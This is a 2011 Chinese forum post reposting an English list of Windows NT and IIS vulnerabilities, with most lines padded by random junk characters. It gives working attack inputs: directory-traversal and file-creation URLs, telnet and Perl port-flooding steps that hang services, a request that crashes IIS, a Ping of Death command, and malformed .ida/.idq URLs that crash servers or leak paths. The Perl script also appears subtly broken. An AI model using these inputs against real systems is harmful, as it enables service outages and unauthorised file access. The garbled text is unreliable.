找回密码
 注册

QQ登录

只需一步,快速开始

NT的漏洞及描述(英文)

[复制链接]
发表于 2011-1-13 17:12:25 | 显示全部楼层 |阅读模式
受影响系统:4.0,iis 1.0
7 k2 t3 m, |  ^A URL such as 'http://www.domain.com/..\..' allows you to browse and download files outside of the webserver content root directory.
$ \) T3 x  l$ }% N4 G( E4 _9 W+ O7 q  g' `$ A
A URL such as 'http://www.domain.com/scripts..\..\scriptname' allows you to execute the target script.
0 T( a* u% v0 ?& b: ~: o6 t0 }) b' Z1 w1 k3 Y" N. @
By default user 'Guest' or IUSR_WWW has read access to all files on an NT disk. These files can be browsed, executed or downloaded by wandering guests.* D) ]: Y- n2 c: \+ _

8 Z: j! k4 q' U) v# [--------------------------------------------------------------------( W  p5 N5 m# N& g! @! B/ C  f; s
6 d0 j! ~+ j) Y3 c
受影响系统:4.0
% t- n$ t, A: q; s& PA URL such as http://www.domain.com/scripts/exploit.bat>PATH\target.bat will create a file 'target.bat''.+ L6 s, m# [( N

# T+ P) X" p) y. RIf the file 'target.bat' exists, the file will be truncated.
+ Z" t+ d3 z3 }/ H! |% y; V# b* j! y5 m

' |9 E* a8 P% V8 k& k4 U. {A URL such as http://www.domain.com/scripts/script_name%0A%0D>PATH\target.bat will create an output file 'target.bat''.
: x6 }5 M2 V# v! L, N
) y' q6 ^1 W/ W5 J. f9 X4 D" C----------------------------------------------------------------------8 C6 N) m: ~+ c9 U6 p6 }
9 J2 Z/ o& f" I9 t
受影响系统:3.51,4.05 s' b4 [" q2 `8 k
Multiple service ports (53, 135, 1031) are vunerable to 'confusion'.- m& [5 C; C4 A5 r. O" l

  d" Z' n2 F5 z- J7 PThe following steps;+ ~9 P7 S7 b- ]4 d% {  B! T1 B

  z8 A" t; |$ g6 rTelnet to an NT 4.0 system on port 135 6 o/ ^! e, Y" b, w8 I6 `
Type about 10 characters followed by a <CR> 4 r3 U  _! M2 M% Q$ C
Exit Telnet 2 _7 o/ x# o/ @* l6 Z
results in a target host CPU utilization of 100%, though at a lower priority than the desktop shell. Multiple services which are confused can result in a locked system.
* T& T4 y, U" E+ f" b+ h3 z0 g/ j+ B
When launched against port 135, NT Task manager on the target host shows RPCSS.EXE using more than usual process time. To clear this the system must be rebooted.
0 s9 d8 `: A$ o- U$ r- C3 H' _# \3 y! @6 }
The above also works on port 1031 (inetinfo.exe) where IIS services must be restarted.0 v/ S# k1 ~+ ^. h& U& U
% S9 s0 x+ z9 x5 f7 [- K3 i6 p9 E7 c4 v
If a DNS server is running on the system, this attack against port 53 (dns.exe) will cause DNS to stop functioning./ |& t5 v& |& E7 l
) K+ S5 G& d1 x2 c) A+ {
The following is modified perl script gleaned from postings in the NTsecurity@iss.net list to test ports on your system (Perl is available from the NT resource kit):
9 g9 t6 n! u' U+ z, S, f' g
* |: ]; E8 u1 s( J+ J) J/*begin poke code*/
1 l8 R" |' S% |7 r
3 K3 s! b5 p" W( P, s6 b3 ouse Socket;9 W% R2 y+ R# M- M3 {2 |
use FileHandle;
9 o% M" b4 \6 D/ T: \0 K$ crequire "chat2.pl";0 W; l5 z' }1 w, L( z! ^3 ]

- @6 R- M- V. x; a- w4 R$systemname = $ARGV[0] && shift;! }. E- v5 f0 Q7 M# o& ?7 g( U
& i6 U2 B- l9 e4 u' u4 a1 G$ Z
$verbose = 1; # tell me what you're hitting
- C# M6 c/ y/ s% u2 m$knownports = 1; # don't hit known problem ports
" f' h" V/ q, ^8 X; c+ b9 Qfor ($port = $0; $port<65535; $port++) 0 c: i: m- r2 b. M8 S7 x( z
{6 l; T. P: L0 a" H' a

* o- ^/ d2 V7 C# c0 Y9 S6 r' k- T4 X4 x; U$ Y7 J* T
if ($knownports && ($port == 53 || $port == 135 || $port== 1031)) {! y: B' Y7 Z) ?' @/ B' F& J8 m
next;! N9 j* ]+ ]; J5 S
}6 a! d' \6 O& i8 @
$fh = chat::open_port($systemname, $port);
$ F. M! s5 Q" P7 V" ]- ^7 Ychat::print ($fh,"This is about ten characters or more");
" S6 P- F( e  h2 S! B+ w" Nif ($verbose) {0 m% n+ u8 O: k2 Y$ S3 Q( n' X4 `5 m
print "Trying port: $port\n";
# g8 r. S/ ]( E, s} 2 x: J1 _- N$ t, \: Q
chat::close($fh);
! X3 d; F7 `8 X5 N$ H- l5 D* I) [, w
}
' h# W/ ^/ l  ^
+ Y3 W& @  y3 D0 N: y1 F' @
( |  n0 [9 G- P6 c/*end poke code*/% p6 F# h: m9 n0 \$ v% Z" o, E/ x
$ R  @6 [$ y& x
Save the above text as c:\perl\bin\poke, run like this: C:\perl\bin> perl poke servername
5 e% ^/ S5 m. U; ~/ [8 j+ p2 c" \9 ^. e6 S4 i. k
--------------------------------------------------------------------------------
6 |* @$ c) o$ ?3 x1 X( m. c: i4 d8 J. Y, U& {) m
受影响系统:4.0) p0 M0 B2 H. t& y! t( k
Using a telnet application to get to a webserver via HTTP port 80, and typing "GET ../.." <cr> will crash IIS.
9 G' ^- F: b& v8 u- Q
2 \# R7 ?6 Y4 t: WThis attack causes Dr. Watson to display an alert window and to log an error: $ a+ D% Y" f4 z6 j! k

* \0 H8 A" q; A( c) Y# H"The application, exe\inetinfo.dbg, generated an application error The error occurred on date@ time The exception generated was c0000005 at address 53984655 (TCP_AUTHENT::TCP_AUTHENT"
  `% L+ A& x! u+ d3 {: p+ w+ ?5 u% Z; M  H
--------------------------------------------------------------------------------; x7 z( v" l) C$ T4 E$ O/ i
* X! ?; x9 b: t  R( q5 \7 H% b
受影响系统:3.51,4.0
  R; z- i! i3 F; s. Y+ wLarge packet pings (PING -l 65527 -s 1 hostname) otherwise known as 'Ping of Death' can cause a blue screen of death on 3.51 systems:1 @2 P1 o# L* R, @' T6 Y
( S6 I5 @% h3 |0 p1 H6 \
STOP: 0X0000001E
! b: B/ J4 |' `6 |8 o5 T4 EKMODE_EXCEPTION_NOT_HANDLED - TCPIP.SYS
3 f& F7 t3 Y3 }9 x9 u* N5 `+ F& p: F" D
-OR-
, U6 e+ H$ O, z6 g- w8 l  o
2 g8 r* j+ f* P) j3 fSTOP: 0x0000000A
: t- c' W9 u9 jIRQL_NOT_LESS_OR_EQUAL - TCPIP.SYS
$ S# K- e0 T6 w; H. p
2 u3 A/ d& I. D0 @; rNT 4.0 is vunerable sending large packets, but does not crash on receiving large packets.
) H# D5 }6 t+ W; m- R" _4 q2 v) W( G0 ~6 e1 Z
--------------------------------------------------------------------------------
+ }8 K/ I4 F4 f6 q$ J  w( Z; A
! q5 W3 A- ?6 C( i! DMicrosoft IIS 5.0 has problems handling a specific form of URL ending with "ida". The problem can have 2 kinds of results. One possible outcome is that the server responds with a message like "URL String too long"; "Cannot find the specified path" or the like. The other possible result is that the server terminates with an "Access Violation" message (effectively causing a Denial of Service attack against the server). Vulnerable are all IIS versions (up to and including IIS 5.0). When a remote attacker issues a URL request with the malformed URL: http://www.example.com/...[25kb of '.']...ida The server will either crash (causing an effective DoS attack) or report its current directory location (revealing the directory structure). 9 e3 \0 i) b( q9 v
5 k2 Z$ J$ I4 r7 ?/ X
--------------------------------------------------------
0 A4 O; ?5 S4 S0 D
9 F1 ^% Z; _. G0 O: j' G9 EIIS, Microsoft's Internet Information Server, can be used to reveal the true path of the files (where they physically reside on the local hard drive), by requesting a non-existing file with an IDQ/IDA extension. By requesting a URL such as: http://www.microsoft.com/anything.ida Or: http://www.microsoft.com/anything.idq A remote user will get a response that looks like: 'The IDQ d:\http\anything.idq could not be found' Such a response allows him to gain further knowledge on how the web site is organized and the directory structure of the server
您需要登录后才可以回帖 登录 | 注册

本版积分规则

QQ|本地广告联系: QQ:905790666 TEL:13176190456|Archiver|手机版|小黑屋|汶上信息港 ( 鲁ICP备19052200号-1 )

GMT+8, 2026-4-30 18:58

Powered by Discuz! X5.0

© 2001-2026 Discuz! Team.

快速回复 返回顶部 返回列表